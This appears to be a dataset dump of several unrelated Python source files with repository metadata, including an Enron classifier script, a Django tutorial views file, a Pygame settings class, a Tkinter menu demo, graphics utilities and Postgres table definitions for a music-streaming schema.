labels, features = targetFeatureSplit(data)
### Task 4: Try a varity of classifiers
### Please name your classifier clf for easy export below.
### Note that if you want to do PCA or other multi-stage operations,
### you'll need to use Pipelines. For more info:
### http://scikit-learn.org/stable/modules/pipeline.html
### Task 5: Tune your classifier to achieve better than .3 precision and recall
### using our testing script. Check the tester.py script in the final project
### folder for details on the evaluation method, especially the test_classifier
### function. Because of the small size of the dataset, the script uses
### stratified shuffle split cross validation. For more info:
### http://scikit-learn.org/stable/modules/generated/sklearn.cross_validation.StratifiedShuffleSplit.html
##### First, import the necessary packages
from sklearn.pipeline import Pipeline
from sklearn.model_selection import GridSearchCV
from sklearn.preprocessing import StandardScaler
from sklearn.feature_selection import SelectKBest
from sklearn.svm import SVC
from sklearn.ensemble import AdaBoostClassifier
from sklearn.neighbors import KNeighborsClassifier
def create_tune_svm():
# Creates a pipeline with the SVC, with feature scaling and
# selection, tunes with GridSearchCV and returns the classifier
pipe = Pipeline([
('scaling', StandardScaler()),
('feature_select', SelectKBest()),
('svm', SVC())
])
param_grid = [{
'feature_select__k': [5, 10, 'all'],
'svm__C': [1, 50, 100, 1000],
'svm__gamma': [0.5, 0.1, 0.01],
'svm__kernel': ['linear', 'rbf']
}]
clf = GridSearchCV(pipe, cv=3, n_jobs=1, param_grid=param_grid,
scoring=['precision','recall'], refit='recall').fit(features, labels)
return clf.best_estimator_
def create_tune_ada():
# Creates a pipeline with the adaboost classifier with feature
# selection, tunes with GridSearchCV and returns the classifier
pipe = Pipeline([
('feature_select', SelectKBest()),
('ada', AdaBoostClassifier())
])
param_grid = [{
'feature_select__k': [5, 10, 'all'],
'ada__n_estimators': [30, 50, 100],
'ada__learning_rate': [0.5, 0.8, 1]
}]
clf = GridSearchCV(pipe, cv=3, n_jobs=1, param_grid=param_grid,
scoring=['precision','recall'], refit='recall').fit(features, labels)
return clf.best_estimator_
def create_tune_kneigh():
# Creates a pipeline with the K-nearest neighbors classifier with feature
# selection, tunes with GridSearchCV and returns the classifier
pipe = Pipeline([
('feature_select', SelectKBest()),
('kn', KNeighborsClassifier())
])
param_grid = [{
'feature_select__k': [5, 10, 'all'],
'kn__n_neighbors': [3, 5, 7, 10],
'kn__p': [1, 2]
}]
clf = GridSearchCV(pipe, cv=3, n_jobs=1, param_grid=param_grid,
scoring=['precision','recall'], refit='recall').fit(features, labels)
return clf.best_estimator_
### Task 6: Dump your classifier, dataset, and features_list so anyone can
### check your results. You do not need to change anything below, but make sure
### that the version of poi_id.py that you submit can be run on its own and
### generates the necessary .pkl files for validating your results.
### For the final classifier, I decided not to use the engineered features
### since they do not make the cut in the SelectKBest for the best algorithm.
features_list = ['poi', 'salary', 'total_payments', 'bonus', 'deferred_income',
'total_stock_value', 'expenses', 'exercised_stock_options', 'other',
'long_term_incentive', 'restricted_stock', 'to_messages',
'from_poi_to_this_person', 'from_messages', 'from_this_person_to_poi',
'shared_receipt_with_poi']
data = featureFormat(my_dataset, features_list, sort_keys = True)
labels, features = targetFeatureSplit(data)
clf = Pipeline([
('feature_select', SelectKBest(k = 5)),
('kn', KNeighborsClassifier(n_neighbors = 3, p = 1))
])
dump_classifier_and_data(clf, my_dataset, features_list)
|
[
"noreply@github.com"
] |
kiquin.noreply@github.com
|
435fae641c64ab154adb9a9dbc79b24ff37a76e9
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03254/s777543439.py
|
f376be6a40bddef486d5505eef6113f9426e6c02
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 240
|
py
|
N,x = map(int,input().split())
a = sorted(list(map(int,input().split())))
s = [sum(a[:i+1]) for i in range(N)]
if s[-1] == x:
print(N)
exit()
else:
for i in range(N-1):
if s[i] > x:
print(i)
exit()
print(N-1)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
b0b8d6fb1b86beeccf8f4efdab45665d50edf3ee
|
7dcc6d0eb866b3315bf729ec00dfd71db6847ce2
|
/wiserSmartAPI/__init__.py
|
2d1ef8213473d5e86d310c9c1a88e8100a5edee8
|
[
"MIT"
] |
permissive
|
lucguillotin/wiser-smart-api
|
fa6a76ae77595ed03536f4ca224b2fa9e5993e02
|
7648f739e188f426449dbefaf8de502dc0290a17
|
refs/heads/master
| 2022-04-29T13:09:30.067664
| 2020-04-24T20:44:13
| 2020-04-24T20:44:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25
|
py
|
name = "wiser-smart-api"
|
[
"thomas.fayoux@gmail.com"
] |
thomas.fayoux@gmail.com
|
ae9423398d9515c9300c7a6dccb895c0cea16b93
|
1f84339ba329c2bfaf51b536bf53e386ff2f7f9c
|
/AlienInvasion/settings.py
|
fa40d67ca49baa04e4802565f5b2066b9ee1f069
|
[] |
no_license
|
samar2788/Python_2021
|
d3853cea07259666f343c4bfd882b832eaed98e6
|
df204f8e83a373c8b79e3222c7adbf3e2765549d
|
refs/heads/main
| 2023-05-14T04:50:11.048899
| 2021-06-05T13:17:36
| 2021-06-05T13:17:36
| 369,771,560
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,657
|
py
|
class Settings:
'''A class to store all settings for Alien Invasion.'''
def __init__(self):
'''Initialize the game's static settings.'''
# Screen settings
self.screen_width = 1200
self.screen_height = 800
self.bg_color = (230, 230, 230)
# Ship settings
# self.ship_speed=1.5
self.ship_limit = 3
# Bullet settings
# self.bullet_speed=1.5
self.bullet_width = 3
self.bullet_height = 15
self.bullet_color = (60, 60, 60)
self.bullets_allowed = 3
# Alien settings
# self.alien_speed=1.0
self.fleet_drop_speed = 10
# How quickly the game speeds up
self.speedup_scale = 1.1
# How quickly the alien point values increase
self.score_scale = 1.5
self.initialize_dynamic_settings()
# fleet_direction of 1 represents right and -1 represents left
# self.fleet_direction=1
def initialize_dynamic_settings(self):
'''Initialize settings that change throughout the game '''
self.ship_speed = 1.5
self.bullet_speed = 3.0
self.alien_speed = 1.0
# Fleet_direction of 1 represent right and -1 represents left
self.fleet_direction = 1
# Scoring
self.alien_points = 50
def increase_speed(self):
'''Increase the speed settings and alien point values'''
self.ship_speed *= self.speedup_scale
self.bullet_speed *= self.speedup_scale
self.alien_speed *= self.speedup_scale
self.alien_points = int(self.alien_points * self.score_scale)
print(self.alien_points)
|
[
"samarbhargava@yahoo.co.in"
] |
samarbhargava@yahoo.co.in
|
2e6fad123df7e365f68f89ed21ca82427560c3f8
|
489270b3d9655e8fa2a36d024db413bcc656c6b7
|
/drop_down_menu.py
|
2e931d4711ab6498fde6f2df8b82084a73cb3c07
|
[] |
no_license
|
pawantilara/Tkinter-programs
|
cc3bd333933ebeeeb1b70a3aaf0f19284ab82ae2
|
2938d2a9dc76b01692328b1460bc6e50df028f59
|
refs/heads/master
| 2020-03-29T02:15:16.700331
| 2019-03-12T09:22:07
| 2019-03-12T09:22:07
| 149,426,946
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,716
|
py
|
from tkinter import *
from tkinter import messagebox
from tkinter import ttk
def quit_app():
root.quit()
def show_about(event=None):
messagebox.showwarning("About","This program is created on 16/16/18")
root=Tk()
the_menu=Menu(root)
file_menu=Menu(the_menu,tearoff=0,bd=2)
file_menu.add_command(label="Open")
file_menu.add_command(label="Save")
file_menu.add_separator()
file_menu.add_command(label="Quit",command=quit_app)
the_menu.add_cascade(label="File",menu=file_menu)
#-------------Font Menu-----------
text_font=StringVar()
text_font.set("Times")
def change_font(event=None):
print("Font picked :",text_font.get())
font_menu=Menu(the_menu,tearoff=0)
font_menu.add_radiobutton(label="Times",variable=text_font
,command=change_font)
font_menu.add_radiobutton(label="Courierr",variable=text_font,
command=change_font)
font_menu.add_radiobutton(label="Arieal",variable=text_font,
command=change_font)
#-------------view Menu-----------
view_menu=Menu(the_menu,tearoff=0)
#root.config(menu=the_menu)
line_numbers=IntVar()
line_numbers.set(1)
view_menu.add_checkbutton(label="Line Numbers",variable=line_numbers)
view_menu.add_cascade(label="Fonts", menu=font_menu)
the_menu.add_cascade(label="View",menu=view_menu)
#-------------Help Menu-----------
help_menu=Menu(the_menu,tearoff=0)
help_menu.add_command(label="About",accelerator="command-A",command=show_about)
the_menu.add_cascade(label="Help",menu=help_menu)
root.bind("<Command-A>",show_about)
root.bind("<Command-a>",show_about)
root.config(menu=the_menu)
root.mainloop()
|
[
"noreply@github.com"
] |
pawantilara.noreply@github.com
|
c58e9db45a8a23e62d361f6e8dbea681148a9a14
|
cc7bbdbb22cb6f7e7916388a5ee8218bc8ffa158
|
/Python3/Django/StudentsDemo/myApp/views.py
|
bdbfe07a86d02fa7d185625413201379ac96e973
|
[
"MIT"
] |
permissive
|
youngqqcn/QBlockChainNotes
|
a816e067642f48a6da38b624663254b4016ec496
|
c9c143eaba6c06e3cee866669ec286e4d3cdbba8
|
refs/heads/master
| 2023-04-03T23:31:05.585545
| 2023-03-30T09:29:07
| 2023-03-30T09:29:07
| 155,657,459
| 37
| 15
|
MIT
| 2023-03-06T23:09:32
| 2018-11-01T03:33:11
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 13,077
|
py
|
from django.shortcuts import render, redirect
# Create your views here.
from django.http import HttpResponse
from .models import Grades, Students, StudentsManager
from django.db.models import Max, Min, Sum, Avg
def index(request):
return HttpResponse("Hello, world. this is index page")
def detail(request, num):
return HttpResponse(f"this is page {num}")
def grades_details(request):
#去modles取数据
grades = Grades.objects.all()
return render(request, "myApp/grades.html", {
"grades" : grades
})
def get_grade_students(request, grade_id : int):
"""
展示一个班级的所有学生
:param request:
:param grade_id:
:return:
"""
grade = Grades.objects.get(id=grade_id)
all_students = grade.students_set.all()
return render(request=request,
template_name="myApp/students.html",
context={
"students" : all_students
})
def students_details(request):
# students = Students.objects.all()
students = Students.stu_not_delete.all()
return render(request=request,
template_name="myApp/students.html" ,
context={
"students" : students
})
def add_default_student(request):
grade = Grades.objects.get(id=1)
#使用模型类
stu = Students.create_student(name='default',
age=999,
gender=False,
contend='this is default',
grade=grade,
is_delete=False)
stu.save()
return HttpResponse(content='added successed')
def add_default_student_use_manager(request):
grade = Grades.objects.get(id=1)
#使用自定义管理器
stu = Students.create_student(name='default2',
age=999,
gender=False,
contend='this is default2',
grade=grade,
is_delete=False)
stu.save()
return HttpResponse(content='added successed')
def show_students_page(request, page_index : int):
assert page_index >= 1
page_size = 2
stus = Students.stu_not_delete.all()[(page_index - 1) * page_size : page_index * page_size]
return render(request=request,
template_name="myApp/students.html",
context={
"students" : stus
})
def search_student(request):
#模糊查询
# stus = Students.stu_not_delete.filter(sname__contains='t')
# stus = Students.stu_not_delete.filter(sage__gte=20) #年龄大于等于20
max_age = Students.stu_not_delete.aggregate(Max('sage'))
print(max_age)
stus = []
return render(request=request,
template_name="myApp/students.html",
context={
"students": stus
})
def search_relate(request):
#关联查询: 查询scontend中包含 'hapy' 的学生属于哪些班级
grades = Grades.objects.filter(students__scontend__contains='hapy')
print(len(grades))
return render(request, "myApp/grades.html", {
"grades": grades
})
from django.db.models import F, Q
def search_student_by_F(request):
grades = Grades.objects.filter(ggirlnum__gt=F("gboynum"))
print(grades)
return HttpResponse(f"found {len(grades)}")
def search_student_by_Q(request):
# Q(xx) | Q(xxx) 或
# Q(xx) & Q(xxx) 且
# ~Q(xxxx) 非
students = Students.stu_not_delete.filter( ~( Q(sgender=False) & Q(sage__lt=30) ) )
return render(request=request,
template_name="myApp/students.html",
context={
"students": students
})
def test_re_path(request):
return HttpResponse("ok")
import json
def request_props(request):
rsp = {
'path': request.path,
'method': request.method,
'encoding': request.encoding,
'GET' : request.GET,
'POST' : request.POST,
'FILES' : request.FILES,
'COOKIES' : request.COOKIES,
'session' : request.session.is_empty(),
'is_ajax' : request.is_ajax()
}
return HttpResponse( json.dumps(rsp) )
def get_url_parameters(request):
rsp = request.GET
return HttpResponse( json.dumps(rsp) )
def get_url_parameters2(request):
# http://127.0.0.1:8000/get2?a=999,444&b=222&c=ccccc
a = request.GET.getlist('a')
print(type(a))
return HttpResponse( json.dumps(a) )
def show_register(request):
return render(request=request, template_name="myApp/register.html")
def register(request):
name = request.POST.get("name")
hobby = request.POST.get("hobby")
gender = request.POST.get("gender")
rsp = {
"name" : name,
"hobby" : hobby,
"gender" : gender,
}
return HttpResponse(json.dumps(rsp))
def show_response(request):
# rsp = HttpResponse(content='xxxxxx')
# rsp.write()
# rsp.set_cookie()
# rsp.get()
# rsp.getvalue()
# rsp.close()
# rsp.serialize()
# rsp.delete_cookie()
# rsp.set_signed_cookie()
return HttpResponse('')
# 设置了cookie 之后, 以后的每次请求都会带上 cookie
def set_custom_cookies(request):
rsp = HttpResponse()
rsp.set_cookie("MYCOOKIE", "THIS IS MY COOIKES")
return rsp
from django.http import HttpResponseRedirect
def test_redirect(request):
# 重定向到 子路径下的 request_props
# return HttpResponseRedirect(redirect_to='request_props/')
#重定向到根路径下的
return HttpResponseRedirect(redirect_to='/request_props/')
from django.http import JsonResponse
def json_response(request):
data = {
'name' : 'yqq',
'age' : 10,
'hobby' : 'music'
}
return JsonResponse(data=data)
# path(r'mainpage/', views.show_main_page, name='show_main_page'),
# path(r'user_login/', views.user_login, name='login')
def show_main_page(request):
#为什么默认值没有生效????
username = request.session.get('username', default="游客")
if username is None: username = "游客"
return render(request=request,
template_name="myApp/mainpage.html",
context={
'username' : username
})
def show_login_page(request):
return render(request=request,
template_name="myApp/login.html")
#在django_session 表中 的 session_data有 username, base64编码
def user_login(request):
username = request.POST.get('username')
request.session['username'] =username
request.session.set_expiry(value=1000) #10s过期
return HttpResponseRedirect('/mainpage/')
pass
from django.contrib.auth import login, logout
def user_logout(request):
# request.session.delete('username') #行不通
# logout(request)
# request.session.clear() #ok
# request.session.flush() #ok
logout(request) #推荐
return HttpResponseRedirect('/mainpage/')
def students_counter(request):
stus = Students.stu_all.all()
strtmp = "this is test string"
return render(request=request, template_name="myApp/students_counter.html"
,context={
"students" : stus,
"strtmp" : strtmp
})
def show_reverse_url_page(request):
return render(request=request,
template_name="myApp/reverse_mapping_url.html",
)
def reverse_url_test(request, num : int):
return HttpResponse(content=f"test successed! num is {num}")
def template_externs(request):
return render(request=request, template_name="myApp/sub_page.html")
def html_code(request):
return render(request=request,
template_name="myApp/html_code.html",
context={
'html_rsp' : "<h1>This is html h1!</h1>"
})
def show_test_csrf_page(request):
return render(request=request,
template_name='myApp/csrf_test.html' )
def verifycode(request):
# 引入绘图模块
from PIL import Image, ImageDraw, ImageFont
# 引入随机函数模块
import random
# 定义变量,用于画面的背景色,宽,高
bgcolor = (random.randrange(20, 100), random.randrange(20, 100), random.randrange(20, 100))
width = 100
height = 50
# 创建画面对象
im = Image.new('RGB', (width, height), bgcolor)
# 创建画面对象
draw = ImageDraw.Draw(im)
# 调用画笔的point()函数绘制噪点
for i in range(0, 100):
xy = (random.randrange(0, width), random.randrange(0, height))
fill = (random.randrange(0, 255), 255, random.randrange(0, 255))
draw.point(xy, fill=fill)
# 定义验证码的备选值
characters = '1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm'
# 随机选取4个值作为验证码
rand_str = ''
for i in range(0, 4):
rand_str += characters[random.randrange(0, len(characters))]
# 构造字体对象
font = ImageFont.truetype(r'C:\Windows\Fonts\Arial.ttf', 40)
# 构造字体颜色
fontcolor1 = (255, random.randrange(0, 255), random.randrange(0, 255))
fontcolor2 = (255, random.randrange(0, 255), random.randrange(0, 255))
fontcolor3 = (255, random.randrange(0, 255), random.randrange(0, 255))
fontcolor4 = (255, random.randrange(0, 255), random.randrange(0, 255))
# 绘制4个字
draw.text((5, 2), rand_str[0], font=font, fill=fontcolor1)
draw.text((25, 2), rand_str[1], font=font, fill=fontcolor2)
draw.text((50, 2), rand_str[2], font=font, fill=fontcolor3)
draw.text((75, 2), rand_str[3], font=font, fill=fontcolor4)
# 释放画笔
del draw
# 存入session,用于做进一步的验证
request.session['verifycode'] = rand_str
# 内存文件操作
import io
buf = io.BytesIO()
# 将图片保存在内存中,文件类型为png
im.save(buf, 'png')
# 将内存中的图片数据返回给客户端,MIME类型为图片png
return HttpResponse(buf.getvalue(), 'image/png')
def verify_code_image(request):
return verifycode(request)
def test_csrf(request):
# print(request.POST)
right_verifycode = request.session.get('verifycode')
user_post_verifycode = request.POST.get('verifycode')
if right_verifycode.upper() != user_post_verifycode.upper():
return redirect(to="/show_test_csrf_page/")
username = request.POST.get("username")
password = request.POST.get("passwd")
return HttpResponse("登录成功!!" + json.dumps(
{
'username' : username,
'password' : password,
}
))
def static_page(request):
return render(request=request,
template_name="myApp/my_static.html")
def upload_file_page(request):
return render(request=request,
template_name="myApp/upload_file.html")
import os
from django.conf import settings
def upload_file(request):
if request.method != 'POST':
return HttpResponse('failed!')
# file = request.FILES["file"]
file = request.FILES.get("file")
file_path = os.path.join( settings.MEDIA_ROOT, file.name)
with open(file_path, 'wb') as outfile:
for block in file.chunks(): #
outfile.write(block)
return HttpResponse("uploaded success!")
from django.core.paginator import Paginator
def student_paginator(request, page_index : int):
students = Students.stu_all.all()
paginator = Paginator( object_list=students, per_page=2 )
one_page_stus = paginator.get_page(number= page_index )
return render(request=request,
template_name="myApp/student_paginator.html",
context={
"students" : one_page_stus
})
def test_ajax(request):
all_stus = Students.stu_all.all()
stus_list = all_stus.values()
print(stus_list)
# print(type(stus_list))
retdata = [ item for item in stus_list ]
return JsonResponse({"data": retdata})
# return JsonResponse({'name' : 'yqq'})
def show_test_ajax_page(request):
return render(request=request,
template_name="myApp/test_ajax.html",
)
def test_mctext(request):
return render(request=request,
template_name='myApp/test_tinymce.html')
#
# # from .task import test_celery_task
# # from .task import
# # import myApp.task
# # from myApp import task
# from .task import TestCeleryTask
# def test_celery(request):
#
# # test_celery_task()
# # res = task.test_celery_task.delay(1, 3)
# # TestCeleryTask.apply_async(args=('gooood', ))
# # print(f'result {res}')
#
# return render(request=request,
# template_name='myApp/test_celery.html')
|
[
"youngqqcn@163.com"
] |
youngqqcn@163.com
|
eeb932461dc3471c7abe683bfa4e33bb5d412efe
|
bb6abd0b31d015e6e843d9bae92dd6650fce9313
|
/FIB.py
|
b41adebd8ef71d84cb4758b4b0d807f29687bb4e
|
[] |
no_license
|
TheNoiy11/2016-Python
|
57c887d587db7bd097531dbc4ba4ab8fbbcaae09
|
dcc2eb65b297498bfcd335accb9510356e8e9976
|
refs/heads/master
| 2021-04-28T23:48:07.801210
| 2016-12-31T05:43:43
| 2016-12-31T05:43:43
| 77,726,886
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 301
|
py
|
def fib(int):
list = [0,1]
if int <= 0:
return []
elif int <= 2:
return list[:int]
elif int > 2:
for i in range(1,int-1):
list.append((list[i]+list[i-1]))
return list
while True:
x = int(input("Enter an integer: "))
if x < 0:
break
print()
print(fib(x))
print()
|
[
"noreply@github.com"
] |
TheNoiy11.noreply@github.com
|
4db9fec7ea82de57582b7230e40c34ee46474968
|
b41ccdd8a6bc9f1cb4a0f1fa4776eaaceba9b59b
|
/bansoko/graphics/__init__.py
|
65b27549fde98337c9b8fbad88a36d724c1380f1
|
[
"MIT"
] |
permissive
|
mseyne/bansoko
|
0d75f56cd2d6dcfdfd63a1c7bc28e24e6771a988
|
463a7b5785636ea797d049eb8e4a3d91306d7dc2
|
refs/heads/master
| 2023-02-03T18:06:29.933164
| 2020-12-24T00:44:50
| 2020-12-24T00:44:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,733
|
py
|
"""Module exposing graphic related classes and routines."""
from dataclasses import dataclass
from enum import unique, Enum
from functools import total_ordering
from typing import List, Optional, Tuple, Generator
TILEMAP_WIDTH = 256
TILEMAP_HEIGHT = 256
TILE_SIZE = 8
IMAGE_BANK_WIDTH = 256
IMAGE_BANK_HEIGHT = 256
SCREEN_WIDTH = 256
SCREEN_HEIGHT = 256
@unique
class Direction(Enum):
"""Enumeration representing direction in 2D space.
In addition to int value identifying direction (direction_index) it also stores the
movement vector (dx, dy)
"""
UP = 0, (0, -1)
DOWN = 1, (0, 1)
LEFT = 2, (-1, 0)
RIGHT = 3, (1, 0)
def __init__(self, direction_index: int, delta: Tuple[int, int]) -> None:
self.direction_index = direction_index
self.dx = delta[0]
self.dy = delta[1]
@property
def horizontal(self) -> bool:
"""Value indicating whether the direction is horizontal or not."""
return self in (Direction.LEFT, Direction.RIGHT)
@property
def vertical(self) -> bool:
"""Value indicating whether the direction is vertical or not."""
return self in (Direction.UP, Direction.DOWN)
@classmethod
def num_directions(cls) -> int:
"""Number of all defined directions."""
return len(cls.__members__)
@property
def opposite(self) -> "Direction":
"""The opposite direction to given direction."""
if self == Direction.UP:
return Direction.DOWN
if self == Direction.DOWN:
return Direction.UP
if self == Direction.LEFT:
return Direction.RIGHT
if self == Direction.RIGHT:
return Direction.LEFT
raise Exception(f"Direction {str(self)} is not supported")
@dataclass(frozen=True)
class Point:
"""A point representing a location in (x, y) screen space."""
x: int
y: int
@classmethod
def from_list(cls, coords: List[int]) -> "Point":
"""Create a Point from the list of coordinates."""
return cls(x=coords[0], y=coords[1])
@property
def as_list(self) -> List[int]:
"""Point represented as a list containing [x, y]."""
return [self.x, self.y]
def offset(self, offset: "Point") -> "Point":
"""Create a new Point which is the result of moving this Point by (x, y)."""
return Point(self.x + offset.x, self.y + offset.y)
def move(self, direction: Direction) -> "Point":
"""Create a new Point which is the result of moving this Point in given direction."""
return Point(self.x + direction.dx, self.y + direction.dy)
@total_ordering
@dataclass(frozen=True)
class Size:
"""Size describes width and height dimensions in pixels."""
width: int = 0
height: int = 0
def enlarge(self, dx: int, dy: Optional[int] = None) -> "Size":
"""Create a new Size enlarged by (dx, dy)"""
return Size(self.width + dx, self.height + (dy if dy else dx))
@property
def max_dimension(self) -> int:
"""Maximum dimension (which is either width or height)"""
return max(self.width, self.height)
def can_fit(self, size: "Size") -> bool:
"""Test if given size will fit in this size. Size "fits" in another size only if both width
and height are less or equal to the size the test is performed against to.
"""
return self.width >= size.width and self.height >= size.height
def __lt__(self, other: Tuple[int, ...]) -> bool:
return (self.width, self.height) < (other[0], other[1])
def max_size(size1: Size, size2: Size) -> Size:
"""Create size with maximum width and height of two given sizes."""
return Size(max(size1.width, size2.width), max(size1.height, size2.height))
def min_size(size1: Size, size2: Size) -> Size:
"""Create size with minimum width and height of two given sizes."""
return Size(min(size1.width, size2.width), min(size1.height, size2.height))
SCREEN_RECT = Size(SCREEN_WIDTH, SCREEN_HEIGHT)
@dataclass(frozen=True)
class Rect:
"""A rectangle represented by position and size.
Position and size can be accessed directly. Use left, right, top, bottom the get the
coordinates of rectangle 4 edges.
"""
position: Point
size: Size
@classmethod
def from_coords(cls, x: int, y: int, w: int, h: int) -> "Rect":
"""Create a new Rect with given position (x, y) and size (w, h)"""
return cls(position=Point(x, y), size=Size(w, h))
@classmethod
def from_list(cls, coords: List[int]) -> "Rect":
"""Create a new Rect from the list containing coordinates and size."""
return cls(position=Point(coords[0], coords[1]), size=Size(coords[2], coords[3]))
@classmethod
def from_size(cls, size: Size) -> "Rect":
"""Create a new Rect with given size and positioned at (0, 0)."""
return cls(position=Point(0, 0), size=size)
@property
def as_list(self) -> List[int]:
"""Rect represented as a list containing [x, y, w, h]."""
return [self.position.x, self.position.y, self.size.width, self.size.height]
@property
def x(self) -> int:
"""The x coordinate of the rect."""
return self.position.x
@property
def y(self) -> int:
"""The y coordinate of the rect."""
return self.position.y
@property
def w(self) -> int:
"""The width of the rect."""
return self.size.width
@property
def h(self) -> int:
"""The height of the rect."""
return self.size.height
@property
def left(self) -> int:
"""The position of left edge of the rect."""
return self.x
@property
def right(self) -> int:
"""The position of right edge of the rect."""
return self.x + self.w - 1
@property
def top(self) -> int:
"""The position of top edge of the rect."""
return self.y
@property
def bottom(self) -> int:
"""The position of bottom edge of the rect."""
return self.y + self.h - 1
def offset(self, delta: Point) -> "Rect":
"""Create a new Rect which is the result of moving this Rect by (dx, dy)."""
return Rect(self.position.offset(delta), self.size)
def enlarge(self, w: int, h: int) -> "Rect":
"""Create a new Rect enlarged with given size (w, h)."""
return Rect(position=self.position, size=self.size.enlarge(w, h))
def inside_points(self) -> Generator[Point, None, None]:
"""Generator for iterating over all valid positions inside the rectangle (from top-left to
bottom-right)."""
for y in range(self.y, self.y + self.h):
for x in range(self.x, self.x + self.w):
yield Point(x, y)
def hcenter(width: int, target_x: int, target_width: int = SCREEN_WIDTH) -> int:
"""Center horizontally 'size' with specified width in a target section (described by x and
width)."""
return target_x + (target_width - width) // 2
def vcenter(height: int, target_y: int, target_height: int = SCREEN_HEIGHT) -> int:
"""Center vertically 'size' with specified height in a target section (described by y and
height)."""
return hcenter(height, target_y, target_height)
def center_in_rect(size: Size, target_rect: Rect = Rect.from_size(SCREEN_RECT)) -> Rect:
"""Return rectangle with given size centered in target rectangle."""
x = hcenter(size.width, target_rect.x, target_rect.w)
y = vcenter(size.height, target_rect.y, target_rect.h)
return Rect(Point(x, y), size)
@dataclass(frozen=True)
class Layer:
"""Layer is an abstract surface on which elements can be drawn.
Layers are used when drawing elements that should be put on each other in order to achieve
pseudo 3d effect.
Attributes:
layer_index - index of the layer (used to calculate layer offset)
opaque - is layer opaque *OR* transparent
global_offset - offset of elements drawn on the layer
"""
layer_index: int
opaque: bool = False
global_offset: Point = Point(0, 0)
@property
def offset(self) -> Point:
"""Position offset for all graphical objects drawn on this layer."""
return self.global_offset.offset(Point(-self.layer_index, -self.layer_index))
@property
def transparency_color(self) -> int:
"""Transparency color for the layer."""
return -1 if self.opaque else 0
|
[
"kfurtak1024@gmail.com"
] |
kfurtak1024@gmail.com
|
3bdc5c2b23fa05965fe948f62dc57d22944841e9
|
c7ed386ee16aa762fea8a6e159a498ace4a7b0f8
|
/venv/bin/mailmail
|
ae0f15adba14ae9a8b251927751740bb69864996
|
[] |
no_license
|
Frostpeters/spider
|
264521cbcb4c27de9bde7d2eead585ce53b50f3e
|
81ecb76c18a08dae998b813553bcef5bf8c3695c
|
refs/heads/master
| 2023-01-18T21:01:16.176669
| 2020-08-30T16:13:22
| 2020-08-30T16:13:22
| 284,435,874
| 0
| 0
| null | 2020-08-30T16:13:24
| 2020-08-02T10:05:06
|
Python
|
UTF-8
|
Python
| false
| false
| 268
|
#!/home/frost/PycharmProjects/scrapy_project/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from twisted.mail.scripts.mailmail import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(run())
|
[
"frostpeters101@gmail.com"
] |
frostpeters101@gmail.com
|
|
bdc2849d7e72c4c8e3705ed93b04851cb37cb4ba
|
d33eed067b2b8712312449568821368a057b7a01
|
/Project1/sql_queries.py
|
d59ca66d145ecbea95069ff67d713f909082d12a
|
[] |
no_license
|
sgouda0412/udacityDataEngNanoDeg
|
d61d23f7fedaaf08450caeb3e2af6cb15ac194bb
|
622a7f8e0d0156c79ceb095e842458f0db233c4d
|
refs/heads/master
| 2023-03-21T16:01:33.687589
| 2020-12-08T00:30:57
| 2020-12-08T00:30:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,702
|
py
|
# DROP TABLES
songplay_table_drop = "DROP TABLE IF EXISTS songplays"
user_table_drop = "DROP TABLE IF EXISTS users"
song_table_drop = "DROP TABLE IF EXISTS songs"
artist_table_drop = "DROP TABLE IF EXISTS artists"
time_table_drop = "DROP TABLE IF EXISTS time"
# CREATE TABLES
songplay_table_create = ("""
CREATE TABLE IF NOT EXISTS songplays(
songplay_id SERIAL PRIMARY KEY,
start_time timestamp REFERENCES time(start_time),
user_id int NOT NULL REFERENCES users(user_id),
level varchar,
song_id varchar REFERENCES songs(song_id),
artist_id varchar REFERENCES artists(artist_id),
session_id int,
location varchar,
user_agent varchar)
""")
user_table_create = ("""
CREATE TABLE IF NOT EXISTS users(
user_id int PRIMARY KEY,
first_name varchar NOT NULL,
last_name varchar NOT NULL,
gender varchar,
level varchar)
""")
song_table_create = ("""
CREATE TABLE IF NOT EXISTS songs(
song_id varchar PRIMARY KEY,
title varchar NOT NULL,
artist_id varchar NOT NULL,
year int,
duration float NOT NULL)
""")
artist_table_create = ("""
CREATE TABLE IF NOT EXISTS artists(
artist_id varchar PRIMARY KEY,
name varchar NOT NULL,
location varchar,
latitude float,
longitude float)
""")
time_table_create = ("""
CREATE TABLE IF NOT EXISTS time(
start_time timestamp PRIMARY KEY,
hour int,
day int,
week int,
month int,
year int,
weekday int)
""")
# INSERT RECORDS
songplay_table_insert = ("""INSERT INTO songplays(
start_time,
user_id,
level,
song_id,
artist_id,
session_id,
location,
user_agent) VALUES (%s, %s, %s, %s, %s, %s, %s, %s);
""")
user_table_insert = ("""INSERT INTO users(
user_id,
first_name,
last_name,
gender,
level) VALUES (%s, %s, %s, %s, %s)
ON CONFLICT (user_id) DO UPDATE SET level = excluded.level;
""")
song_table_insert = ("""INSERT INTO songs(
song_id,
title,
artist_id,
year,
duration) VALUES (%s, %s, %s, %s, %s)
ON CONFLICT (song_id) DO NOTHING;
""")
artist_table_insert = ("""INSERT INTO artists(
artist_id,
name,
location,
latitude,
longitude) VALUES (%s, %s, %s, %s, %s)
ON CONFLICT (artist_id) DO NOTHING;
""")
time_table_insert = ("""INSERT INTO time(
start_time,
hour,
day,
week,
month,
year,
